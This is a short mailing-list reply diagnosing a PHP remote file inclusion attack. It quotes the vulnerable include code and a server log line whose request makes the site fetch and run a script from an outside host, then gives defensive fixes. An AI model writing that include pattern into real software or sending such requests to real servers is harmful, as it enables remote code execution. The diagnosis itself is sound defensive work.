Hi, > at that mentioned time someone at least tried to access pages which are > not accessable (index.php?img=1 e.g.) > > ther definately might be a problem in the code: > > if ( $_GET['page'] ) { > include $_GET['page'].'/index.php'; > } > > > could this be the vulnerable code segment? Looks like that's the one. Have a look at the following line in your log file: 82.103.132.227 - - [29/Oct/2006:20:12:34 +0100] "GET /index.php?page=http://www.excelsiorgroningen.nl/www/.admin/readname.txt? HTTP/1.1" 200 39094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" Your script then includes and executes the script from the URL. How to avoid? First, follow RULE ONE (TM): Always do sanity checks on user-supplied input. The impact could have been avoided by setting allow_url_fopen to 0 in your php.ini. (Unless one of your scripts really, really needs this - but think twice before using it!) But IMHO your approach to include files with dynamically generated paths is not a good idea anyway. Consider a different solution like redirecting the Browser to the resulting URL. This won't prevent the attack from being successful, but it won't affect your server. Best regards, Holger
Attachment:
pgp4UIzFrtpd9.pgp
Description: PGP signature